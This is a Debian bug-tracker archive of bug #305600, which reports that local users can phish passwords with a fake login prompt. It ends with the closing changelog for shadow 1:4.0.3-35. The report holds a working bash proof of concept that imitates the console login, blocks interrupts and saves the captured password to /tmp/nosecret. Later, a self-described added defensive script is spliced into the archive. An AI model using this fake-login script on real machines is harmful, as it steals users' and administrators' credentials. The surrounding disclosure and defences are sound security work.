[Pkg-shadow-devel] Bug#305600: marked as done ([MARTIN] [DOC] Preventing login phishing)
Debian Bug Tracking System
owner@bugs.debian.org
Tue, 07 Jun 2005 09:03:39 -0700
Your message dated Tue, 07 Jun 2005 11:48:26 -0400
with message-id <E1DfgJW-0000Mj-00@newraff.debian.org>
and subject line Bug#305600: fixed in shadow 1:4.0.3-35
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 21 Apr 2005 00:33:48 +0000
From gps@mittelerde.physik.uni-konstanz.de Wed Apr 20 17:33:47 2005
Return-path: <gps@mittelerde.physik.uni-konstanz.de>
Received: from honk1.physik.uni-konstanz.de [134.34.140.224]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DOPdW-0005F6-00; Wed, 20 Apr 2005 17:33:42 -0700
Received: from localhost (localhost.localnet [127.0.0.1])
by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 6C2F92BC43
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:40 +0200 (CEST)
Received: from honk1.physik.uni-konstanz.de ([127.0.0.1])
by localhost (honk [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
id 08967-14 for <submit@bugs.debian.org>;
Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from gandalf.physik.uni-konstanz.de (gandalf.physik.uni-konstanz.de [134.34.140.5])
(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
(No client certificate requested)
by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 26F282BC39
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from bilbo.physik.uni-konstanz.de (bilbo.physik.uni-konstanz.de [134.34.140.32])
by gandalf.physik.uni-konstanz.de (Postfix) with ESMTP id B997CC
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:35 +0200 (CEST)
Received: from gps by bilbo.physik.uni-konstanz.de with local (Exim 3.35 #1 (Debian))
id 1DOPdP-0003Qg-00; Thu, 21 Apr 2005 02:33:35 +0200
Date: Thu, 21 Apr 2005 02:33:35 +0200
From: Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: login is vulnerable to local phishing attacks
Message-ID: <20050421003335.GA13179@bilbo>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Reportbug-Version: 3.8
User-Agent: Mutt/1.5.6+20040907i
Sender: Gerhard Schrenk <gps@bilbo.physik.uni-konstanz.de>
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at honk.physik.uni-konstanz.de
Delivered-To: submit@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Package: login
Version: 1:4.0.3-30.7
Severity: important
Tags: security
Every local user can simply start a little program that imitates login and
grabs the password, pretending it's wrong. It's really hard for the average user
to spot the difference and to make sure that he really didn't mistype the
password. Most users have no read access to /var/log/auth.log and thus cannot
check afterwards. If the attacker crashes X so that it doesn't restart
(unreproducible, but quite easy for users who have reached their quota limit...)
and disables ssh (by pulling the network cable), you have good chances of getting
the password of your local admin/root.
Proof of concept:
#!/bin/bash
# Fake login prompt. Start it from a logged-in shell with
#   exec ./scriptname
# so that no parent shell is left behind on the console.
trap '' INT TSTP          # ignore ^C and ^Z so the victim cannot drop back to the shell
clear
echo
echo "Debian GNU/Linux 3.1 medusa tty1"   # mimic the real /etc/issue banner
echo
read -p "medusa login: " user
stty -echo                # hide the typed password, as the real login does
read -p "Password: " nosecret
stty echo
echo
echo "$nosecret" > /tmp/nosecret   # stash the captured password
sleep 3                   # the real login also pauses before rejecting
echo "Login incorrect"
echo
exec login                # hand over to the real login so the second attempt succeeds
IMHO the easiest security enhancement for password-based local
authentication seems to be (anyone have better ideas?) key sequences that can
only be caught by the kernel or by apps that are suid root.
For example, one can put the line
kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
in /etc/inittab. Then one *can* "zap" every time to respawn getty and
login.
In a multi-user (lab) environment it would be desirable if the admin
could enforce such a safe key sequence before getty/login starts. I have
played with 'getty -t' and/or s/respawn/once/ in /etc/inittab but have not
yet found a satisfying solution.
The best solution I found was to spawn the getty with a timeout, e.g.
3:23:respawn:/sbin/getty -t 60 38400 tty3
and to patch the default getty (agetty.c in util-linux) with an additional
signal handler for SIGALRM. Now the user *must* first kill the timed-out getty
with the safe(?) kbrequest. Quick 'n dirty idea:
struct sigaction sa;                 /* installed alongside agetty's other handlers */
sigemptyset(&sa.sa_mask);
sa.sa_flags = 0;
sa.sa_handler = sigalrm_handler;
sigaction(SIGALRM, &sa, NULL);
...
/* -t fires SIGALRM on timeout; stop instead of exiting, so init does not
   respawn a fresh getty until the kbrequest handler has killed this one */
static void sigalrm_handler(int sig)
{
	(void)sig;          /* unused */
	raise(SIGSTOP);
}
Since I don't yet know the *right* Debian default solution, I open
this bug against login.
-- Gerhard
-- System Information:
Debian Release: 3.1
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.11.6-clients
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Versions of packages login depends on:
ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries an
ii libpam-modules 0.76-22 Pluggable Authentication Modules f
ii libpam-runtime 0.76-22 Runtime support for the PAM librar
ii libpam0g 0.76-22 Pluggable Authentication Modules l
-- no debconf information
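The two mechanisms sketched in the report above (checking what actually owns a console before typing a password on it, and zapping the console from a kbrequest action so that init respawns a clean getty) as an added shell example. This is not code from the bug report or from the shadow package. It assumes procps `ps -eo user=,pid=,comm=,tty=` output (four whitespace-separated columns), `fgconsole` from the kbd package, and that root-owned getty/agetty/mingetty/login are the only programs that belong on an idle console; the ps sample at the bottom is constructed.

```shell
#!/bin/sh
# Added example: a console "trusted path" check built on the idea in the
# report above.  It is not code from the bug report or from the shadow
# package.  Assumptions: procps `ps -eo user=,pid=,comm=,tty=` output
# (four whitespace-separated columns), `fgconsole` from the kbd package,
# and that root-owned getty/agetty/mingetty/login are the only programs
# that belong on an idle console.

# Read "USER PID COMM TTY" lines on stdin and print every process attached
# to console $1 that is not a root-owned getty/login.  Exit status 0 means
# the console holds only what init put there; 1 means something else (a
# user's look-alike login script, or an already logged-in shell) owns it.
untrusted_on_tty() {
    awk -v tty="$1" '
        BEGIN { bad = 0 }
        $4 == tty && ($1 != "root" || $3 !~ /^(getty|agetty|mingetty|login)$/) {
            printf "untrusted process on %s: user=%s pid=%s comm=%s\n", tty, $1, $2, $3
            bad = 1
        }
        END { exit bad }
    '
}

# Live check of the foreground virtual console.  Run it from ssh or from
# another console *before* typing an admin password on the foreground one.
audit_fg_console() {
    vt="tty$(fgconsole)"
    ps -eo user=,pid=,comm=,tty= | untrusted_on_tty "$vt"
}

# kbrequest action for /etc/inittab, equivalent to the report's
#   kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
# but logging what it found before killing everything on the console so
# that init respawns a fresh getty.
zap_fg_console() {
    vt="tty$(fgconsole)"
    ps -eo user=,pid=,comm=,tty= | untrusted_on_tty "$vt" | logger -t kbrequest
    fuser -KILL -ksn file "/dev/$vt"
}

# Constructed sample of `ps -eo user=,pid=,comm=,tty=` output: tty1 holds a
# real getty, tty2 holds a user process that renamed itself "login", tty3
# holds an authenticated session.
SAMPLE_PS='root 812 getty tty1
gps 9102 login tty2
root 813 login tty3
gps 9120 bash tty3'

for vt in tty1 tty2 tty3; do
    if printf '%s\n' "$SAMPLE_PS" | untrusted_on_tty "$vt"; then
        echo "$vt: only init's getty/login present, safe to log in"
    else
        echo "$vt: do not type a password here"
    fi
done
```

The check keys on the owning uid rather than the process name, because a fake login can call itself "login" (tty2 in the sample) but cannot run as root. It only helps someone who has a second, trusted session (ssh, another console) to run it from; for the user standing at the phished console the kbrequest action remains the only thing that cannot be imitated, which is why `zap_fg_console` kills the whole console rather than just the flagged processes.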
---------------------------------------
Received: (at 305600-close) by bugs.debian.org; 7 Jun 2005 15:51:47 +0000
From katie@ftp-master.debian.org Tue Jun 07 08:51:47 2005
Return-path: <katie@ftp-master.debian.org>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DfgMk-0004BC-00; Tue, 07 Jun 2005 08:51:46 -0700
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1DfgJW-0000Mj-00; Tue, 07 Jun 2005 11:48:26 -0400
From: Christian Perrier <bubulle@debian.org>
To: 305600-close@bugs.debian.org
X-Katie: $Revision: 1.56 $
Subject: Bug#305600: fixed in shadow 1:4.0.3-35
Message-Id: <E1DfgJW-0000Mj-00@newraff.debian.org>
Sender: Archive Administrator <katie@ftp-master.debian.org>
Date: Tue, 07 Jun 2005 11:48:26 -0400
Delivered-To: 305600-close@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
X-CrossAssassin-Score: 7
Source: shadow
Source-Version: 1:4.0.3-35
We believe that the bug you reported is fixed in the latest version of
shadow, which is due to be installed in the Debian FTP archive:
login_4.0.3-35_i386.deb
to pool/main/s/shadow/login_4.0.3-35_i386.deb
passwd_4.0.3-35_i386.deb
to pool/main/s/shadow/passwd_4.0.3-35_i386.deb
shadow_4.0.3-35.diff.gz
to pool/main/s/shadow/shadow_4.0.3-35.diff.gz
shadow_4.0.3-35.dsc
to pool/main/s/shadow/shadow_4.0.3-35.dsc
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 305600@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Christian Perrier <bubulle@debian.org> (supplier of updated shadow package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Fri, 3 Jun 2005 07:32:07 +0200
Source: shadow
Binary: login passwd
Architecture: source i386
Version: 1:4.0.3-35
Distribution: unstable
Urgency: low
Maintainer: Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>
Changed-By: Christian Perrier <bubulle@debian.org>
Description:
login - system login tools
passwd - change and administer password and group data
Closes: 59439 113191 163635 166173 169046 249372 251926 283729 300720 305600 306614 307251 307262 308479 308647 308658 308662 308839 308909 308921 309212 309380 309666 309800 310386 311554 311588
Changes:
shadow (1:4.0.3-35) unstable; urgency=low
.
* Re-apply the debian/patches/036_CAN-2004-1001_passwd_check patch
which fixed the "Adjusted password check to fix authentication bypass"
security issue (CAN-2004-1001)
* Debian packaging fixes:
- Add --host to config_options on cross build. Patch from NIIBE Yutaka.
Closes: #283729
- Enable login for GNU/Hurd in rules. First patch from Robert Millan.
Closes: #249372
- Cleanup passwd debconf stuff as md5 passwords are assumed since
1:4.0.3-19 and the resolution of #223664.
- Document the TTYPERM variable set to 0600 in the default login.defs file
Closes: #59439
- Make login and su use limits.so PAM module by default
(change made in sarge branch also)
Closes: #300720
- debian/rules: Add removal of config.log in the clean target
- debian/control:
- Add Martin to Uploaders
- Remove Sam Hartman from Uploaders. The team is now set up and this
does not really have a real meaning now. You're still welcome for
NMUs, Sam, and thanks for the good work.
- Switching from dpatch to quilt.
* Debconf translation updates:
- Portuguese spellchecked by Miguel Figueiredo
- Punjabi (Gurmukhi) added, by Amanpreet Singh Alam. Closes: #309800
* Man pages translation updates:
- German completed by reference to original man page
Closes: #311554
* Debian specific programs fixes:
- NONE
* Upstream bugs not fixed in upstream releases or CVS:
- 421_login.1_pishing:
Document how to initiate a trusted path under Linux
Closes: #305600
- set CLOSE_SESSIONS to yes in login.defs, and document why.
Closes: #163635
* Upstream bugs already fixed in upstream releases or CVS:
- 324_configure.in-no-debian-dir:
Separated from 004_configure.in : this change will not be needed when
syncing with upstream
- 325_gshadow_5_manpage:
Add a gshadow.5 man page, and clarifications in the newgrp and gpasswd
man pages.
Closes: #113191, #166173, #169046, #251926
- 326_su.1_pwconv.8-typos:
Correct typos in su.1 and pwconv.8 man pages.
Closes: #309666
* Translation updates:
- 004_configure.in, 100_LINGUAS
Add Vietnamese to LINGUAS. Patch for LINGUAS in configure.in moved
from 004_configure.in to the new 100_LINGUAS patch
- 101_cs: Czech updated by Miroslav Kure
Closes: #308658
- 102_de: German updated by Dennis Stampfer
- 104_fr: French updated by Jean-Luc Coulon
Closes: #308909
- 111_ca: Catalan completed by Guillem Jover
Closes: #309212
- 108_sv: Swedish completed with the help of Magnus Holmgren
Encoding issues fixed
Closes: #309380
- 109_uk: Ukrainian completed by Eugeniy Meshcheryakov
Closes: #308647
- 120_nl: Dutch updated by Bart Cornelis
Closes: #308662
- 124_ru: Russian updated by Yuri Kozlov
Closes: #308839
- 129_ru: Romanian updated by Sorin Bataruc
Closes: #308921
- 130_zh_TW: Traditional Chinese updated by Tetralet
Closes: #311588
- 131_tl: Tagalog updated by Eric Pareja
Closes: #310386
- 132_vi: Correct file used for Vietnamese translation
Closes: #306614, #307251, #307262, #308479
Files:
c6ea9b25080b8c93386290646686deb3 823 base required shadow_4.0.3-35.dsc
8be96b6637309bea08efe10eda1dc9eb 1413235 base required shadow_4.0.3-35.diff.gz
8c3454ad98e3805067f28a4d3ee0b194 532514 base required passwd_4.0.3-35_i386.deb
a9a395fc2095091d1f07ce0360ca6fe1 591114 base required login_4.0.3-35_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFCpbxd1OXtrMAUPS0RAmZJAJwPMPuV97thtUsWt6/A/KzwhOEvEgCfUKfy
mHoY5PPl10/p1iPo5IR2GnQ=
=6Ybw
-----END PGP SIGNATURE-----